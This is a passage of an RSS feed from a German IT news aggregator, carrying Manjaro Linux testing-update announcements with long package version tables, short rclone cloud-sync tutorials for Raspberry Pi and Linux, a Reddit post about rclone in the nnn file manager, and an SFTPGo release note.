-------------------------------------------------------------------------------
                  lib32-alsa-plugins              1.2.1-1              1.2.1-2
                        lib32-faudio              20.01-1              20.02-1
                        lib32-gnutls           3.6.11.1-1             3.6.12-1
                       lib32-libidn2              2.2.0-1              2.3.0-1
                           lib32-nss             3.49.2-3               3.50-1
                         lib32-pango        1:1.44.7-1 1:1.44.7+11+g73b46b04-1
                          lib32-zstd              1.4.3-1              1.4.4-1
                               pcsx2              1.4.0-8              1.4.0-9

</code></pre>
<div class="poll" data-poll-status="open" data-poll-type="regular" data-poll-name="poll">
<div>
<div class="poll-container">
<ul><li data-poll-option-id="893d9543968a33fa1039e2d7c2aff9f3">No issue, everything went smoothly</li>
<li data-poll-option-id="f62cf202dc0ce246aa612290c3f33f1f">Yes there was an issue. I was able to resolve it myself.(Please post your solution)</li>
<li data-poll-option-id="e1ee941aacf54cee0c82939acae184cc">Yes i am currently experiencing an issue due to the update. (Please post about it)</li>
</ul></div>
<div class="poll-info">
<p>
<span class="info-number">0</span>
<span class="info-label">voters</span>
</p>
</div>
</div>
</div>
<p>Check if your mirror has already synced:</p>
<ul><li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul></blockquote>
            <p>Posts: 2</p>
            <p>Participants: 1</p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2020-02-11-kernels-kde-git-kde-framework-firefox-73-0-systemd-244-2/123703">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tutorial: Wie man den Raspberry Pi mit der Cloud synchroniert (Teil 2)]]></title>
<description><![CDATA[Manchmal reicht es aus, wenn der heimische Raspberry Pi neue Daten in die Cloud schiebt. In anderen Fällen will man aber natürlich eine Synchronisation in beide Richtungen durchführen, wie man es vom normalen Rechner auch kennt. Damit dies funktioniert, benötigt man zusätzlich zur Software rclone...]]></description>
<link>https://tsecurity.de/de/1006745/it-security-nachrichten/tutorial-wie-man-den-raspberry-pi-mit-der-cloud-synchroniert-teil-2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1006745/it-security-nachrichten/tutorial-wie-man-den-raspberry-pi-mit-der-cloud-synchroniert-teil-2/</guid>
<pubDate>Tue, 28 Jan 2020 22:30:11 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/videos/Software/Tutorial-Wie-man-den-Raspberry-Pi-mit-der-Cloud-synchroniert-Teil-2-21115.html"><img hspace="5" border="0" align="left" alt="Cloud, Synchronisation, mini-pc, SemperVideo, raspberry pi, minirechner, mini-rechner, Anleitung, Tutorial" width="128" height="72" src="https://videos.winfuture.de/21115.jpg"></a>
			Manchmal reicht es aus, wenn der heimische <a href="https://winfuture.de/special/raspberry-pi/" title="Raspberry Pi Special">Raspberry Pi</a> neue Daten in die <a href="https://winfuture.de/special/cloud/" title="Cloud Special">Cloud</a> schiebt. In anderen Fällen will man aber natürlich eine Synchronisation in beide Richtungen durchführen, wie man es vom normalen Rechner auch kennt. Damit dies funktioniert, benötigt man zusätzlich zur Software rclone, deren Installation im ersten Teil dieses kleinen Tutorials Thema war, nun noch ein Skript namens rclonesync.			(<a href="https://winfuture.de/videos/Software/Tutorial-Wie-man-den-Raspberry-Pi-mit-der-Cloud-synchroniert-Teil-2-21115.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Tutorial: Wie man den Raspberry Pi mit der Cloud synchroniert (Teil 1)]]></title>
<description><![CDATA[Der Raspberry Pi eignet sich als günstige Hardware für die Einrichtung eines zentralen Hubs im heimischen Netzwerk. Dabei wäre es schön, wenn sich das System auch mit den verschiedenen Cloud-Diensten synchronisieren könnte, die bei den meisten Anwendern inzwischen eine zentrale Rolle in der alltä...]]></description>
<link>https://tsecurity.de/de/1006747/it-security-nachrichten/tutorial-wie-man-den-raspberry-pi-mit-der-cloud-synchroniert-teil-1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1006747/it-security-nachrichten/tutorial-wie-man-den-raspberry-pi-mit-der-cloud-synchroniert-teil-1/</guid>
<pubDate>Tue, 28 Jan 2020 22:30:11 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/videos/Software/Tutorial-Wie-man-den-Raspberry-Pi-mit-der-Cloud-synchroniert-Teil-1-21114.html"><img hspace="5" border="0" align="left" alt="Cloud, Synchronisation, mini-pc, SemperVideo, raspberry pi, minirechner, mini-rechner, Anleitung, Tutorial, rclone" width="128" height="72" src="https://videos.winfuture.de/21114.jpg"></a>
			Der <a href="https://winfuture.de/special/raspberry-pi/" title="Raspberry Pi Special">Raspberry Pi</a> eignet sich als günstige Hardware für die Einrichtung eines zentralen Hubs im heimischen Netzwerk. Dabei wäre es schön, wenn sich das System auch mit den verschiedenen <a href="https://winfuture.de/special/cloud/" title="Cloud Special">Cloud-Diensten</a> synchronisieren könnte, die bei den meisten Anwendern inzwischen eine zentrale Rolle in der alltäglichen Datenverwaltung spielen. Die Betreiber der Services bieten hierfür meist keine geeigneten Tools an, doch kann die <a href="https://winfuture.de/special/open-source/" title="Open Source Special">Open Source-Szene</a> wie so oft weiterhelfen.			(<a href="https://winfuture.de/videos/Software/Tutorial-Wie-man-den-Raspberry-Pi-mit-der-Cloud-synchroniert-Teil-1-21114.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux tutorial on how to mount your cloud storage via rclone.]]></title>
<description><![CDATA[$ df -h Filesystem Size Used Avail Use% Mounted on ... dropbox: 2.1T 173G 1.9T 9% /dropbox ​ [Install rclone] sudo apt install rclone -or- https://rclone.org/install/ ​ [Config rclone to your cloud storage] https://rclone.org/docs/ ​ [Mount cloud stoage] https://rclone.org/commands/rclone_mount/ ...]]></description>
<link>https://tsecurity.de/de/1004248/linux-tipps/linux-tutorial-on-how-to-mount-your-cloud-storage-via-rclone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1004248/linux-tipps/linux-tutorial-on-how-to-mount-your-cloud-storage-via-rclone/</guid>
<pubDate>Sun, 26 Jan 2020 06:45:12 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>$ df -h</p> <p>Filesystem Size Used Avail Use% Mounted on</p> <p>...</p> <p>dropbox: 2.1T 173G 1.9T 9% /dropbox</p> <p>​</p> <p><strong>[Install rclone]</strong></p> <p>sudo apt install rclone</p> <p>-or-</p> <p><a href="https://rclone.org/install/">https://rclone.org/install/</a></p> <p>​</p> <p><strong>[Config rclone to your cloud storage]</strong></p> <p><a href="https://rclone.org/docs/">https://rclone.org/docs/</a></p> <p>​</p> <p><strong>[Mount cloud stoage]</strong></p> <p><a href="https://rclone.org/commands/rclone_mount/">https://rclone.org/commands/rclone_mount/</a></p> <p>sudo mkdir /dropbox</p> <p>sudo chown -R username:group /dropbox</p> <p>rclone mount dropbox:/ /dropbox/ &amp;</p> <p>​</p> <p><strong>[Create script to mount at login]</strong></p> <p>#!/bin/bash</p> <p>rclone mount dropbox:/ /dropbox/ &amp;</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/drman769"> /u/drman769 </a> <br><span><a href="https://www.reddit.com/r/linux/comments/eu25zf/linux_tutorial_on_how_to_mount_your_cloud_storage/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/eu25zf/linux_tutorial_on_how_to_mount_your_cloud_storage/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Last night's commit gave me more pleasure than last month's salary!]]></title>
<description><![CDATA[Hi r/linux, I couldn't help but share this... the absolute joy of writing something that's so rewarding in itself. I added this commit recently to integrate rclone with nnn. Once done, I tested some cloud accounts I haven't accessed in years. I mounted box, dropbox, mail.ru, google drive, yandex,...]]></description>
<link>https://tsecurity.de/de/929488/linux-tipps/last-nights-commit-gave-me-more-pleasure-than-last-months-salary/</link>
<guid isPermaLink="true">https://tsecurity.de/de/929488/linux-tipps/last-nights-commit-gave-me-more-pleasure-than-last-months-salary/</guid>
<pubDate>Tue, 26 Nov 2019 15:45:18 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi <a href="https://www.reddit.com/r/linux">r/linux</a>,</p> <p>I couldn't help but share this... the absolute joy of writing something that's so rewarding in itself.</p> <p>I added this <a href="https://github.com/jarun/nnn/commit/e6f9d6d2d0a6213ef90759ce46375ff6436c0f21">commit</a> recently to integrate <code>rclone</code> with <code>nnn</code>. Once done, I tested some cloud accounts I haven't accessed in years.</p> <p>I mounted box, dropbox, mail.ru, google drive, yandex, mega, pcloud on my Linux box at a keystroke... I didn't know I've like TBs of free cloud storage till I checked the available spaces in the <code>nnn</code> help screen!</p> <p>I was considering buying a new storage in Christmas. Realized I have more than enough in the cloud!</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/sablal"> /u/sablal </a> <br><span><a href="https://www.reddit.com/r/linux/comments/e1ygai/last_nights_commit_gave_me_more_pleasure_than/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/e1ygai/last_nights_commit_gave_me_more_pleasure_than/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[SFTPGo 0.9.4 Released]]></title>
<description><![CDATA[SFTPGo is a free and open source full featured and highly configurable SFTP server written in Go. It works on Linux, macOS and Windows and has no runtime dependencies. Here are the main new features and fixes compared to the 0.9.3 version: Portable mode: a convenient way to share a single directo...]]></description>
<link>https://tsecurity.de/de/928026/linux-tipps/sftpgo-094-released/</link>
<guid isPermaLink="true">https://tsecurity.de/de/928026/linux-tipps/sftpgo-094-released/</guid>
<pubDate>Mon, 25 Nov 2019 14:45:17 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>SFTPGo is a free and open source full featured and highly configurable SFTP server written in Go. It works on Linux, macOS and Windows and has no runtime dependencies.</p> <p>Here are the main new features and fixes compared to the 0.9.3 version:</p> <ul><li>Portable mode: a convenient way to share a single directory on demand.</li> <li>Users can be disabled and expire.</li> <li>Configurable custom commands and/or HTTP notifications on user add, update and delete.</li> <li>Improved compatibility and integration with some popular software such as Rclone, restic and Fail2ban.</li> <li>Fixed SFTP POSIX rename support.</li> </ul><p>If you upgrading from a previous version please apply the appropriate SQL upgrade script for your database before starting the 0.9.4 version.</p> <p>For the next release we are working on Git support so that you can host git repo over ssh with virtual accounts, quota, bandwidth throttling. Stay tuned!</p> <p>You can find the full list of features and the documentation on the project page:</p> <p><a href="https://github.com/drakkan/sftpgo">https://github.com/drakkan/sftpgo</a></p> <p>Binary releases for Linux, macOS and Windows are available:</p> <p><a href="https://github.com/drakkan/sftpgo/releases">https://github.com/drakkan/sftpgo/releases</a></p> <p>If you want to suggest a new feature or you find a bug please open an issue here:</p> <p><a href="https://github.com/drakkan/sftpgo/issues">https://github.com/drakkan/sftpgo/issues</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/drakkan1000"> /u/drakkan1000 </a> <br><span><a href="https://www.reddit.com/r/linux/comments/e1fn6t/sftpgo_094_released/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/e1fn6t/sftpgo_094_released/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2019-10-04 - Gnome-Keyring, Budgie, Firefox]]></title>
<description><![CDATA[@philm wrote:
            
              Hello community,
I am happy to announce another Testing Update. Mostly we have updates to Gnome-Keyring, Firefox and Budgie.
repo-compare is one of our new web-services. Give us your feedback on that new service!
Update news
This update holds the following...]]></description>
<link>https://tsecurity.de/de/901169/unix-server/testing-update-2019-10-04-gnome-keyring-budgie-firefox/</link>
<guid isPermaLink="true">https://tsecurity.de/de/901169/unix-server/testing-update-2019-10-04-gnome-keyring-budgie-firefox/</guid>
<pubDate>Fri, 25 Oct 2019 06:01:00 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://forum.manjaro.org/u/philm">@philm</a> wrote:</p>
            <blockquote>
              <p>Hello community,</p>
<p>I am happy to announce another <strong>Testing Update</strong>. Mostly we have updates to <strong>Gnome-Keyring</strong>, <strong>Firefox</strong> and <strong>Budgie</strong>.</p>
<p><img src="https://forum.manjaro.org/uploads/default/original/3X/e/9/e96048fcca8e097ade7d260c8e71381d9a5ae27a.png" alt data-base62-sha1="xixxvHChDWOxX1X5aXhijrS7qiK" width="690" height="491"><br><em><a href="https://manjaro32.org/repo-compare" rel="nofollow noopener">repo-compare</a> is one of our new web-services. Give us <a href="https://forum.manjaro.org/t/105140">your feedback</a> on that new service!</em></p>
<p><strong>Update news</strong></p>
<p>This update holds the following changes:</p>
<ul><li>seems we currently face <a href="https://gitlab.gnome.org/GNOME/gnome-keyring/issues/40" rel="nofollow noopener">some issues</a> with <strong>gnome-keyring</strong> outside of <strong>Gnome</strong>. Let us know if those are fixed on our end.</li>
<li>
<strong>Budgie</strong> got updated to work with <strong>Gnome 3.34</strong>
</li>
<li>
<strong>Firefox</strong> fixed some crashes when <a href="https://www.mozilla.org/en-US/firefox/69.0.2/releasenotes/" rel="nofollow noopener">playing Youtube videos</a>
</li>
<li>The usual updates and improvements and upstream package renewals</li>
<li>
<strong>Manjaro 18.1.1-pre2</strong> got released! Please test and give us feedback: <a href="https://osdn.net/projects/manjaro/storage/gnome/18.1.1-pre2/" rel="nofollow noopener">gnome</a>, <a href="https://osdn.net/projects/manjaro/storage/kde/18.1.1-pre2/" rel="nofollow noopener">kde</a>, <a href="https://osdn.net/projects/manjaro/storage/xfce/18.1.1-pre2/" rel="nofollow noopener">xfce</a>
</li>
<li>Latest efforts by KDE can be reviewed via our <a href="https://osdn.net/projects/manjaro-community/storage/kde-dev/19.0/" rel="nofollow noopener">current KDE-Dev ISO</a> or <a href="https://osdn.net/projects/manjaro-community/storage/kde-vanilla/19.09.15/" rel="nofollow noopener">current KDE-Vanilla ISO</a>
</li>
</ul><p>Give us the usual feedback and let us know what you think about this update.</p>
<hr><p><strong>Current supported Kernels</strong></p>
<ul><li>linux316 3.16.74</li>
<li>linux44 4.4.194 (no legacy nvidia-340 module!)</li>
<li>linux49 4.9.194</li>
<li>linux414 4.14.146</li>
<li>linux419 4.19.76</li>
<li>linux52 5.2.18 (no catalyst module!)</li>
<li>linux53 5.3.2 (no catalyst module!)</li>
<li>linux54 5.4.0-rc1 (not all modules build yet!)</li>
<li>linux419-rt 4.19.72_rt25</li>
<li>linux52-rt 5.2.17_rt9</li>
</ul><p><strong>Package Updates</strong> (Fri Oct 4 10:09:38 CEST 2019)</p>
<ul><li>testing community x86_64:  106 new and 110 removed package(s)</li>
<li>testing core x86_64:  2 new and 2 removed package(s)</li>
<li>testing extra x86_64:  117 new and 116 removed package(s)</li>
<li>testing multilib x86_64:  2 new and 2 removed package(s)</li>
</ul><pre><code class="lang-auto">:: Different overlay package(s) in repository community x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2019-10-03           2019-10-04
-------------------------------------------------------------------------------
               debian-whois-mkpasswd              5.5.1-1              5.5.2-1


:: Different sync package(s) in repository community x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2019-10-03           2019-10-04
-------------------------------------------------------------------------------
               aarch64-linux-gnu-gdb                8.3-1              8.3.1-1
                             acme.sh              2.8.2-2              2.8.3-1
                              aeolus              0.9.7-2              0.9.7-3
                   arm-none-eabi-gdb                8.3-1              8.3.1-1
                             avr-gdb                8.3-1              8.3.1-1
                      budgie-desktop  10.5+35+ga023c778-1             10.5.1-1
                             calibre             3.48.0-1              4.0.0-1
                           clthreads              2.4.2-3              2.4.2-4
                           clxclient              3.9.2-2              3.9.2-3
                               cudnn           7.6.3.30-1           7.6.4.38-1
                                dart              2.5.0-1              2.5.1-1
                         debootstrap            1.0.115-1            1.0.116-1
                           deepin-wm             1.9.38-2             1.9.38-3
                            deja-dup               40.1-2               40.1-3
                              eslint              6.5.0-1              6.5.1-1
                              girara              0.3.2-1              0.3.3-1
                              gitlab             12.3.3-1             12.3.4-1
                    gitlab-workhorse              8.7.0-3             8.12.0-1
                                grpc             1.24.0-1             1.24.1-1
                            grpc-cli             1.24.0-1             1.24.1-1
                                 hub             2.12.7-1             2.12.8-1
                             jenkins              2.196-1              2.197-1
                        languagetool                4.6-1                4.7-1
                        libmediainfo              19.07-1              19.09-1
                           mediainfo              19.07-1              19.09-1
                       mediainfo-gui              19.07-1              19.09-1
                                 mpv           1:0.29.1-8           1:0.29.1-9
                            node-gyp              5.0.2-2              5.0.3-1
                              nodejs            12.11.0-1            12.11.1-1
                            openblas              0.3.6-1              0.3.7-1
                               peony              1.1.5-1              1.1.6-1
                       perl-sys-virt              5.5.0-1              5.6.0-1
                            php-grpc             1.24.0-1             1.24.1-1
                               ponyc             0.31.0-1             0.32.0-1
                    python-aniso8601              7.0.0-1              8.0.0-1
                      python-apispec              2.0.2-1              3.0.0-1
           python-aws-sam-translator             1.14.0-1             1.15.0-1
                        python-blosc              1.8.1-1              1.8.1-4
                   python-bottleneck              1.2.1-3              1.2.1-5
                       python-docker              4.0.2-1              4.1.0-1
                python-elasticsearch              7.0.4-1              7.0.5-1
                     python-envisage              4.7.2-1              4.8.0-2
                   python-et-xmlfile              1.0.1-4              1.0.1-5
                    python-fonttools              4.0.0-1              4.0.2-1
                       python-grpcio             1.24.0-1             1.24.1-1
                        python-jdcal              1.4.1-1              1.4.1-2
                       python-joblib             0.13.2-1             0.14.0-3
                  python-lark-parser              0.7.5-1              0.7.7-1
                      python-logbook              1.4.3-1              1.5.2-1
                      python-numexpr              2.7.0-1              2.7.0-2
                     python-openmdao              2.8.0-1              2.9.0-1
                     python-openpyxl              2.6.2-2              3.0.0-1
            python-pandas-datareader              0.7.4-1              0.8.1-1
                        python-parse             1.12.0-1             1.12.1-1
                     python-pathspec              0.5.9-2              0.6.0-1
                 python-phonenumbers            8.10.19-1            8.10.20-1
                       python-pluggy             0.12.0-1             0.13.0-1
                      python-pylibmc              1.6.0-1              1.6.1-1
                 python-pytest-xdist             1.29.0-1             1.30.0-1
                      python-pytorch              1.2.0-2              1.2.0-3
                 python-pytorch-cuda              1.2.0-2              1.2.0-3
                  python-pytorch-opt              1.2.0-2              1.2.0-3
             python-pytorch-opt-cuda              1.2.0-2              1.2.0-3
                       python-ropper            1.11.11-1             1.12.5-1
              python-snowballstemmer              1.2.1-3              1.9.1-1
                   python-tensorflow              2.0.0-1              2.0.0-2
              python-tensorflow-cuda              2.0.0-1              2.0.0-2
               python-tensorflow-opt              2.0.0-1              2.0.0-2
          python-tensorflow-opt-cuda              2.0.0-1              2.0.0-2
               python-text-unidecode                1.2-2                1.3-1
                     python-traitsui              6.1.2-1              6.1.3-1
                         python-xlrd              1.2.0-1              1.2.0-2
                   python-xlsxwriter              1.2.0-1              1.2.1-2
                         python-xlwt              1.3.0-2              1.3.0-3
                   python2-aniso8601              7.0.0-1              8.0.0-1
                       python2-blosc              1.8.1-1                    -
                  python2-bottleneck              1.2.1-3                    -
               python2-elasticsearch              7.0.4-1              7.0.5-1
                  python2-et-xmlfile              1.0.1-4                    -
                       python2-jdcal              1.4.1-1                    -
                      python2-joblib             0.13.2-1                    -
                 python2-lark-parser              0.7.5-1              0.7.7-1
                     python2-logbook              1.4.3-1              1.5.2-1
                    python2-openpyxl              2.6.2-2                    -
                       python2-parse             1.12.0-1             1.12.1-1
                      python2-pluggy             0.12.0-1             0.13.0-1
                     python2-pylibmc              1.6.0-1              1.6.1-1
                python2-pytest-xdist             1.29.0-1             1.30.0-1
                      python2-ropper            1.11.11-1             1.12.5-1
             python2-snowballstemmer              1.2.1-3              1.9.1-1
              python2-text-unidecode                1.2-2                1.3-1
                        python2-xlrd              1.2.0-1                    -
                  python2-xlsxwriter              1.2.0-1                    -
                        python2-xlwt              1.3.0-2                    -
                            qastools             0.21.0-4             0.22.0-1
                              rclone             1.49.3-1             1.49.4-1
               riscv64-linux-gnu-gdb                8.3-1              8.3.1-1
                              ropper            1.11.11-1             1.12.5-1
                        rust-bindgen             0.50.0-1             0.51.1-1
                                 sbt            1:1.3.0-1            1:1.3.1-1
                              scrapy              1.6.0-1              1.7.3-1
                       spice-vdagent             0.19.0-1             0.19.0-2
                              sqlmap              1.3.8-2             1.3.10-1
                          tensorflow              2.0.0-1              2.0.0-2
                     tensorflow-cuda              2.0.0-1              2.0.0-2
                      tensorflow-opt              2.0.0-1              2.0.0-2
                 tensorflow-opt-cuda              2.0.0-1              2.0.0-2
                             unbound              1.9.3-4              1.9.4-1
                             zathura              0.4.3-3              0.4.4-1
                              libemf                    -             1.0.11-2
                             libilbc                    -              2.0.2-4
                           libmysofa                    -                0.8-1
                              libsvm                    -               3.24-1
                                mujs                    -              1.0.6-1
                                vmaf                    -             1.3.15-1


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2019-10-03           2019-10-04
-------------------------------------------------------------------------------
             ca-certificates-mozilla               3.46-1             3.46.1-1
                                 nss               3.46-1             3.46.1-1


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2019-10-03           2019-10-04
-------------------------------------------------------------------------------
                        gtk3-classic            3.24.11-1            3.24.11-2
                       gnome-keyring                    -         1:3.34.0-1.1


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2019-10-03           2019-10-04
-------------------------------------------------------------------------------
                             firefox             69.0.1-1             69.0.2-1
                    firefox-i18n-ach             69.0.1-1             69.0.2-1
                     firefox-i18n-af             69.0.1-1             69.0.2-1
                     firefox-i18n-an             69.0.1-1             69.0.2-1
                     firefox-i18n-ar             69.0.1-1             69.0.2-1
                    firefox-i18n-ast             69.0.1-1             69.0.2-1
                     firefox-i18n-az             69.0.1-1             69.0.2-1
                     firefox-i18n-be             69.0.1-1             69.0.2-1
                     firefox-i18n-bg             69.0.1-1             69.0.2-1
                     firefox-i18n-bn             69.0.1-1             69.0.2-1
                     firefox-i18n-br             69.0.1-1             69.0.2-1
                     firefox-i18n-bs             69.0.1-1             69.0.2-1
                     firefox-i18n-ca             69.0.1-1             69.0.2-1
                    firefox-i18n-cak             69.0.1-1             69.0.2-1
                     firefox-i18n-cs             69.0.1-1             69.0.2-1
                     firefox-i18n-cy             69.0.1-1             69.0.2-1
                     firefox-i18n-da             69.0.1-1             69.0.2-1
                     firefox-i18n-de             69.0.1-1             69.0.2-1
                    firefox-i18n-dsb             69.0.1-1             69.0.2-1
                     firefox-i18n-el             69.0.1-1             69.0.2-1
                  firefox-i18n-en-ca             69.0.1-1             69.0.2-1
                  firefox-i18n-en-gb             69.0.1-1             69.0.2-1
                  firefox-i18n-en-us             69.0.1-1             69.0.2-1
                     firefox-i18n-eo             69.0.1-1             69.0.2-1
                  firefox-i18n-es-ar             69.0.1-1             69.0.2-1
                  firefox-i18n-es-cl             69.0.1-1             69.0.2-1
                  firefox-i18n-es-es             69.0.1-1             69.0.2-1
                  firefox-i18n-es-mx             69.0.1-1             69.0.2-1
                     firefox-i18n-et             69.0.1-1             69.0.2-1
                     firefox-i18n-eu             69.0.1-1             69.0.2-1
                     firefox-i18n-fa             69.0.1-1             69.0.2-1
                     firefox-i18n-ff             69.0.1-1             69.0.2-1
                     firefox-i18n-fi             69.0.1-1             69.0.2-1
                     firefox-i18n-fr             69.0.1-1             69.0.2-1
                  firefox-i18n-fy-nl             69.0.1-1             69.0.2-1
                  firefox-i18n-ga-ie             69.0.1-1             69.0.2-1
                     firefox-i18n-gd             69.0.1-1             69.0.2-1
                     firefox-i18n-gl             69.0.1-1             69.0.2-1
                     firefox-i18n-gn             69.0.1-1             69.0.2-1
                  firefox-i18n-gu-in             69.0.1-1             69.0.2-1
                     firefox-i18n-he             69.0.1-1             69.0.2-1
                  firefox-i18n-hi-in             69.0.1-1             69.0.2-1
                     firefox-i18n-hr             69.0.1-1             69.0.2-1
                    firefox-i18n-hsb             69.0.1-1             69.0.2-1
                     firefox-i18n-hu             69.0.1-1             69.0.2-1
                  firefox-i18n-hy-am             69.0.1-1             69.0.2-1
                     firefox-i18n-ia             69.0.1-1             69.0.2-1
                     firefox-i18n-id             69.0.1-1             69.0.2-1
                     firefox-i18n-is             69.0.1-1             69.0.2-1
                     firefox-i18n-it             69.0.1-1             69.0.2-1
                     firefox-i18n-ja             69.0.1-1             69.0.2-1
                     firefox-i18n-ka             69.0.1-1             69.0.2-1
                    firefox-i18n-kab             69.0.1-1             69.0.2-1
                     firefox-i18n-kk             69.0.1-1             69.0.2-1
                     firefox-i18n-km             69.0.1-1             69.0.2-1
                     firefox-i18n-kn             69.0.1-1             69.0.2-1
                     firefox-i18n-ko             69.0.1-1             69.0.2-1
                    firefox-i18n-lij             69.0.1-1             69.0.2-1
                     firefox-i18n-lt             69.0.1-1             69.0.2-1
                     firefox-i18n-lv             69.0.1-1             69.0.2-1
                     firefox-i18n-mk             69.0.1-1             69.0.2-1
                     firefox-i18n-mr             69.0.1-1             69.0.2-1
                     firefox-i18n-ms             69.0.1-1             69.0.2-1
                     firefox-i18n-my             69.0.1-1             69.0.2-1
                  firefox-i18n-nb-no             69.0.1-1             69.0.2-1
                  firefox-i18n-ne-np             69.0.1-1             69.0.2-1
                     firefox-i18n-nl             69.0.1-1             69.0.2-1
                  firefox-i18n-nn-no             69.0.1-1             69.0.2-1
                     firefox-i18n-oc             69.0.1-1             69.0.2-1
                  firefox-i18n-pa-in             69.0.1-1             69.0.2-1
                     firefox-i18n-pl             69.0.1-1             69.0.2-1
                  firefox-i18n-pt-br             69.0.1-1             69.0.2-1
                  firefox-i18n-pt-pt             69.0.1-1             69.0.2-1
                     firefox-i18n-rm             69.0.1-1             69.0.2-1
                     firefox-i18n-ro             69.0.1-1             69.0.2-1
                     firefox-i18n-ru             69.0.1-1             69.0.2-1
                     firefox-i18n-si             69.0.1-1             69.0.2-1
                     firefox-i18n-sk             69.0.1-1             69.0.2-1
                     firefox-i18n-sl             69.0.1-1             69.0.2-1
                    firefox-i18n-son             69.0.1-1             69.0.2-1
                     firefox-i18n-sq             69.0.1-1             69.0.2-1
                     firefox-i18n-sr             69.0.1-1             69.0.2-1
                  firefox-i18n-sv-se             69.0.1-1             69.0.2-1
                     firefox-i18n-ta             69.0.1-1             69.0.2-1
                     firefox-i18n-te             69.0.1-1             69.0.2-1
                     firefox-i18n-th             69.0.1-1             69.0.2-1
                     firefox-i18n-tr             69.0.1-1             69.0.2-1
                     firefox-i18n-uk             69.0.1-1             69.0.2-1
                     firefox-i18n-ur             69.0.1-1             69.0.2-1
                     firefox-i18n-uz             69.0.1-1             69.0.2-1
                     firefox-i18n-vi             69.0.1-1             69.0.2-1
                     firefox-i18n-xh             69.0.1-1             69.0.2-1
                  firefox-i18n-zh-cn             69.0.1-1             69.0.2-1
                  firefox-i18n-zh-tw             69.0.1-1             69.0.2-1
                             flatpak              1.4.3-1              1.5.0-1
                                 gdb                8.3-1              8.3.1-1
                          gdb-common                8.3-1              8.3.1-1
                              gmime3              3.2.3-3              3.2.4-1
                               gsasl              1.8.0-9              1.8.1-1
                               libuv             1.31.0-1             1.32.0-1
                               msmtp              1.8.5-1              1.8.6-1
                           msmtp-mta              1.8.5-1              1.8.6-1
                             pkgfile                 19-1                 20-2
                       python-beaker             1.10.1-1             1.11.0-1
                    python-packaging               19.1-2               19.2-2
                          python-pip             19.0.3-1             19.2.3-1
                      python-urllib3             1.25.3-1             1.25.5-1
                  python-urllib3-doc             1.25.3-1             1.25.5-1
                      python2-beaker             1.10.1-1             1.11.0-1
                python2-configparser              3.8.1-1              4.0.2-1
                   python2-packaging               19.1-2               19.2-2
                         python2-pip             19.0.3-1             19.2.3-1
                     python2-urllib3             1.25.3-1             1.25.5-1
                      zita-alsa-pcmi              0.3.2-1              0.3.2-2
                      zita-resampler              1.6.2-1              1.6.2-2


:: Different overlay package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2019-10-03           2019-10-04
-------------------------------------------------------------------------------
                  lib32-gtk3-classic            3.24.11-1            3.24.11-2


:: Different sync package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2019-10-03           2019-10-04
-------------------------------------------------------------------------------
                           lib32-nss               3.46-1             3.46.1-1

</code></pre>
<div class="poll" data-poll-status="open" data-poll-type="regular" data-poll-name="poll">
<div>
<div class="poll-container">
<ul><li data-poll-option-id="893d9543968a33fa1039e2d7c2aff9f3">No issue, everything went smoothly</li>
<li data-poll-option-id="f62cf202dc0ce246aa612290c3f33f1f">Yes there was an issue. I was able to resolve it myself.(Please post your solution)</li>
<li data-poll-option-id="e1ee941aacf54cee0c82939acae184cc">Yes i am currently experiencing an issue due to the update. (Please post about it)</li>
</ul></div>
<div class="poll-info">
<p>
<span class="info-number">0</span>
<span class="info-label">voters</span>
</p>
</div>
</div>
</div>
<p>Check if your mirror has already synced:</p>
<ul><li><a href="http://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul></blockquote>
            <p>Posts: 17</p>
            <p>Participants: 11</p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2019-10-04-gnome-keyring-budgie-firefox/105708">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Still relatively new to Linux so I'm sure this is common knowledge but Rsync is awesome.]]></title>
